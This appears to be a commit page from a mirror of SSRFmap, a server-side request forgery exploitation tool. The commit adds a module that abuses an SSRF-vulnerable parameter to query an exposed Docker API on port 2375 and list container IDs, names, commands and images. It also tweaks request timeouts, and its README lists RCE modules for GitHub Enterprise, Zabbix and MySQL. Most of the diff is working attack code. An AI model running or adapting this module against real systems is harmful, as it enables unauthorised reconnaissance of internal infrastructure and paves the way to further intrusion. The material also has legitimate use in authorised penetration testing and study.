swisskyrepo
/
SSRFmap
mirror of https://github.com/swisskyrepo/SSRFmap.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

MODULE - docker : extracting name, commands from the containers/images

pull/3/head
Swissky 2018-10-18 18:07:05 +02:00
parent 08333dfd01
commit aec8eaa935
4 changed files with 62 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
README.md
View File

@ -58,6 +58,7 @@ The following modules are already implemented and can be used with the `-m` argu
| `github` | Github Enterprise RCE < 2.8.7 |
| `zaddix` | Zaddix RCE |
| `mysql` | MySQL Command execution |
| `docker` | Docker Infoleaks via API |
| `smtp` | SMTP send mail |
| `portscan` | Scan ports for the host |
| `networkscan` | HTTP Ping sweep over the network |

11
core/requester.py
View File

@ -52,7 +52,7 @@ class Requester(object):
self.data[name] = value
def do_request(self, param, value):
def do_request(self, param, value, timeout=3, stream=False):
try:
if self.method == "POST":
# Copying data to avoid multiple variables edit
@ -67,7 +67,8 @@ class Requester(object):
"http://" + self.host + self.action,
headers=self.headers,
json=data_injected,
timeout=3
timeout=timeout,
stream=stream
)
# Handle FORM data
@ -76,7 +77,8 @@ class Requester(object):
"http://" + self.host + self.action,
headers=self.headers,
data=data_injected,
timeout=3
timeout=timeout,
stream=stream
)
else:
# String is immutable, we don't have to do a "forced" copy
@ -86,7 +88,8 @@ class Requester(object):
r = requests.get(
"http://" + self.host + data_injected,
headers=self.headers,
timeout=3
timeout=timeout,
stream=stream
)
except Exception as e:
return None

3
core/utils.py
View File

@ -129,7 +129,6 @@ def ip_dns_redirect(ips, ip):
ips.add("1ynrnhl.xip.io")
def gen_ip_list(ip, level):
print(level)
ips = set()
if level == 1:
@ -154,7 +153,5 @@ def gen_ip_list(ip, level):
ip_dotted_hexadecimal(ips, ip)
ip_dotted_octal(ips, ip)
for ip in ips:
yield ip

54
modules/docker.py Normal file
View File

@ -0,0 +1,54 @@
from core.utils import *
import logging
import json
import urllib.parse
# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
name = "docker"
description = "Docker Infoleaks via Open Docker API"
author = "Swissky"
documentation = []
class exploit():
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
gen_host = gen_ip_list("127.0.0.1", args.level)
port = "2375"
for ip in gen_host:
# Step 1 - Extract id and name from each container
data = "containers/json"
payload = wrapper_http(data, ip, port)
r = requester.do_request(args.param, payload)
if r.json:
for container in r.json():
container_id = container['Id']
container_name = container['Names'][0].replace('/','')
container_command = container['Command']
logging.info("Found docker container")
logging.info("\033[32mId\033[0m : {}".format(container_id))
logging.info("\033[32mName\033[0m : {}".format(container_name))
logging.info("\033[32mCommand\033[0m : {}\n".format(container_command))
# Step 2 - Extract id and name from each image
data = "images/json"
payload = wrapper_http(data, ip, port)
r = requester.do_request(args.param, payload)
if r.json:
images = {}
for index, container in enumerate(r.json()):
container_id = container['Id']
container_name = container['RepoTags'][0].replace('/','')
logging.info("Found docker image n°{}".format(index))
logging.info("\033[32mId\033[0m : {}".format(container_id))
logging.info("\033[32mName\033[0m : {}\n".format(container_name))
images[container_name] = container_id